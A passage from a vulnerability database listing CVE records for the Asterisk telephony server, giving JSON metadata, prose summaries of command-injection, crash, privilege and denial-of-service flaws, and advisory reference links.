                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized command execution is possible. The app_minivm module has an \"externnotify\" program configuration option that is executed by the MinivmNotify dialplan application. The application uses the caller-id name and number as part of a built string passed to the OS shell for interpretation and execution. Since the caller-id name and number can come from an untrusted source, a crafted caller-id name or number allows an arbitrary shell command injection."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27103",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27103"
            },
            {
              "name": "1039252",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1039252"
            },
            {
              "name": "https://bugs.debian.org/873908",
              "refsource": "CONFIRM",
              "url": "https://bugs.debian.org/873908"
            },
            {
              "name": "GLSA-201710-29",
              "refsource": "GENTOO",
              "url": "https://security.gentoo.org/glsa/201710-29"
            },
            {
              "name": "DSA-3964",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2017/dsa-3964"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2017-006.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2017-006.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-14100",
    "datePublished": "2017-09-02T16:00:00",
    "dateReserved": "2017-08-31T00:00:00",
    "dateUpdated": "2024-08-05T19:20:39.875Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-32558

Vulnerability from cvelistv5

Published

2021-07-27 05:19

Modified

2024-08-03 23:25

Severity ?

Summary

An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur.

References

▼	URL	Tags
	http://seclists.org/fulldisclosure/2021/Jul/49	mailing-list, x_refsource_FULLDISC
	http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html	x_refsource_MISC
	https://downloads.asterisk.org/pub/security/AST-2021-008.html	x_refsource_MISC
	https://issues.asterisk.org/jira/browse/ASTERISK-29392	x_refsource_MISC
	https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html	mailing-list, x_refsource_MLIST
	https://www.debian.org/security/2021/dsa-4999	vendor-advisory, x_refsource_DEBIAN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T23:25:30.855Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
          },
          {
            "name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
          },
          {
            "name": "DSA-4999",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2021/dsa-4999"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-11-02T10:06:13",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
        },
        {
          "name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
        },
        {
          "name": "DSA-4999",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2021/dsa-4999"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-32558",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2021/Jul/49"
            },
            {
              "name": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
            },
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2021-008.html",
              "refsource": "MISC",
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29392",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
            },
            {
              "name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
            },
            {
              "name": "DSA-4999",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2021/dsa-4999"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-32558",
    "datePublished": "2021-07-27T05:19:34",
    "dateReserved": "2021-05-11T00:00:00",
    "dateUpdated": "2024-08-03T23:25:30.855Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-2651

Vulnerability from cvelistv5

Published

2009-07-30 19:08

Modified

2024-08-07 05:59

Severity ?

Summary

main/rtp.c in Asterisk Open Source 1.6.1 before 1.6.1.2 allows remote attackers to cause a denial of service (crash) via an RTP text frame without a certain delimiter, which triggers a NULL pointer dereference and the subsequent calculation of an invalid pointer.

References

▼	URL	Tags
	http://www.securitytracker.com/id?1022608	vdb-entry, x_refsource_SECTRACK
	http://osvdb.org/56571	vdb-entry, x_refsource_OSVDB
	http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt	x_refsource_MISC
	https://exchange.xforce.ibmcloud.com/vulnerabilities/52046	vdb-entry, x_refsource_XF
	http://downloads.asterisk.org/pub/security/AST-2009-004.html	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/35837	vdb-entry, x_refsource_BID
	http://secunia.com/advisories/36039	third-party-advisory, x_refsource_SECUNIA
	http://www.vupen.com/english/advisories/2009/2067	vdb-entry, x_refsource_VUPEN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T05:59:56.882Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1022608",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1022608"
          },
          {
            "name": "56571",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/56571"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt"
          },
          {
            "name": "asterisk-rtp-dos(52046)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52046"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2009-004.html"
          },
          {
            "name": "35837",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/35837"
          },
          {
            "name": "36039",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36039"
          },
          {
            "name": "ADV-2009-2067",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/2067"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-07-27T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "main/rtp.c in Asterisk Open Source 1.6.1 before 1.6.1.2 allows remote attackers to cause a denial of service (crash) via an RTP text frame without a certain delimiter, which triggers a NULL pointer dereference and the subsequent calculation of an invalid pointer."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1022608",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1022608"
        },
        {
          "name": "56571",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/56571"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt"
        },
        {
          "name": "asterisk-rtp-dos(52046)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52046"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2009-004.html"
        },
        {
          "name": "35837",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/35837"
        },
        {
          "name": "36039",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36039"
        },
        {
          "name": "ADV-2009-2067",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/2067"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2009-2651",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "main/rtp.c in Asterisk Open Source 1.6.1 before 1.6.1.2 allows remote attackers to cause a denial of service (crash) via an RTP text frame without a certain delimiter, which triggers a NULL pointer dereference and the subsequent calculation of an invalid pointer."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1022608",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1022608"
            },
            {
              "name": "56571",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/56571"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt",
              "refsource": "MISC",
              "url": "http://downloads.digium.com/pub/security/AST-2009-004-1.6.1.diff.txt"
            },
            {
              "name": "asterisk-rtp-dos(52046)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52046"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2009-004.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2009-004.html"
            },
            {
              "name": "35837",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/35837"
            },
            {
              "name": "36039",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36039"
            },
            {
              "name": "ADV-2009-2067",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2009/2067"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2009-2651",
    "datePublished": "2009-07-30T19:08:00",
    "dateReserved": "2009-07-30T00:00:00",
    "dateUpdated": "2024-08-07T05:59:56.882Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-8418

Vulnerability from cvelistv5

Published

2014-11-24 15:00

Modified

2024-08-06 13:18

Severity ?

Summary

The DB dialplan function in Asterisk Open Source 1.8.x before 1.8.32, 11.x before 11.1.4.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8 before 1.8.28-cert8 and 11.6 before 11.6-cert8 allows remote authenticated users to gain privileges via a call from an external protocol, as demonstrated by the AMI protocol.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-018.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:18:47.847Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-018.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-11-20T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The DB dialplan function in Asterisk Open Source 1.8.x before 1.8.32, 11.x before 11.1.4.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8 before 1.8.28-cert8 and 11.6 before 11.6-cert8 allows remote authenticated users to gain privileges via a call from an external protocol, as demonstrated by the AMI protocol."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-11-24T13:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-018.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-8418",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The DB dialplan function in Asterisk Open Source 1.8.x before 1.8.32, 11.x before 11.1.4.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8 before 1.8.28-cert8 and 11.6 before 11.6-cert8 allows remote authenticated users to gain privileges via a call from an external protocol, as demonstrated by the AMI protocol."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-018.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-018.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-8418",
    "datePublished": "2014-11-24T15:00:00",
    "dateReserved": "2014-10-22T00:00:00",
    "dateUpdated": "2024-08-06T13:18:47.847Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-8415

Vulnerability from cvelistv5

Published

2014-11-24 15:00

Modified

2024-08-06 13:18

Severity ?

Summary

Race condition in the chan_pjsip channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 allows remote attackers to cause a denial of service (assertion failure and crash) via a cancel request for a SIP session with a queued action to (1) answer a session or (2) send ringing.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-015.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:18:48.176Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-015.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-11-20T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Race condition in the chan_pjsip channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 allows remote attackers to cause a denial of service (assertion failure and crash) via a cancel request for a SIP session with a queued action to (1) answer a session or (2) send ringing."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-11-24T13:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-015.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-8415",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Race condition in the chan_pjsip channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 allows remote attackers to cause a denial of service (assertion failure and crash) via a cancel request for a SIP session with a queued action to (1) answer a session or (2) send ringing."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-015.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-015.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-8415",
    "datePublished": "2014-11-24T15:00:00",
    "dateReserved": "2014-10-22T00:00:00",
    "dateUpdated": "2024-08-06T13:18:48.176Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-8417

Vulnerability from cvelistv5

Published

2014-11-24 15:00

Modified

2024-08-06 13:18

Severity ?

Summary

ConfBridge in Asterisk 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 11.6 before 11.6-cert8 allows remote authenticated users to (1) gain privileges via vectors related to an external protocol to the CONFBRIDGE dialplan function or (2) execute arbitrary system commands via a crafted ConfbridgeStartRecord AMI action.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-017.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:18:48.431Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-11-20T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "ConfBridge in Asterisk 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 11.6 before 11.6-cert8 allows remote authenticated users to (1) gain privileges via vectors related to an external protocol to the CONFBRIDGE dialplan function or (2) execute arbitrary system commands via a crafted ConfbridgeStartRecord AMI action."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-11-24T13:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-017.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-8417",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ConfBridge in Asterisk 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 11.6 before 11.6-cert8 allows remote authenticated users to (1) gain privileges via vectors related to an external protocol to the CONFBRIDGE dialplan function or (2) execute arbitrary system commands via a crafted ConfbridgeStartRecord AMI action."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-017.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-017.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-8417",
    "datePublished": "2014-11-24T15:00:00",
    "dateReserved": "2014-10-22T00:00:00",
    "dateUpdated": "2024-08-06T13:18:48.431Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-2287

Vulnerability from cvelistv5

Published

2014-04-18 19:00

Modified

2024-08-06 10:06

Severity ?

Summary

channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.15 before 1.8.15-cert5 and 11.6 before 11.6-cert2, when chan_sip has a certain configuration, allows remote authenticated users to cause a denial of service (channel and file descriptor consumption) via an INVITE request with a (1) Session-Expires or (2) Min-SE header with a malformed or invalid value.

References

▼	URL	Tags
	http://www.securityfocus.com/bid/66094	vdb-entry, x_refsource_BID
	http://downloads.asterisk.org/pub/security/AST-2014-002.html	x_refsource_CONFIRM
	https://issues.asterisk.org/jira/browse/ASTERISK-23373	x_refsource_CONFIRM
	http://www.mandriva.com/security/advisories?name=MDVSA-2014:078	vendor-advisory, x_refsource_MANDRIVA
	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html	vendor-advisory, x_refsource_FEDORA
	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html	vendor-advisory, x_refsource_FEDORA
	http://downloads.asterisk.org/pub/security/AST-2014-002-1.8.diff	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T10:06:00.091Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "66094",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/66094"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-002.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23373"
          },
          {
            "name": "MDVSA-2014:078",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
          },
          {
            "name": "FEDORA-2014-3762",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
          },
          {
            "name": "FEDORA-2014-3779",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
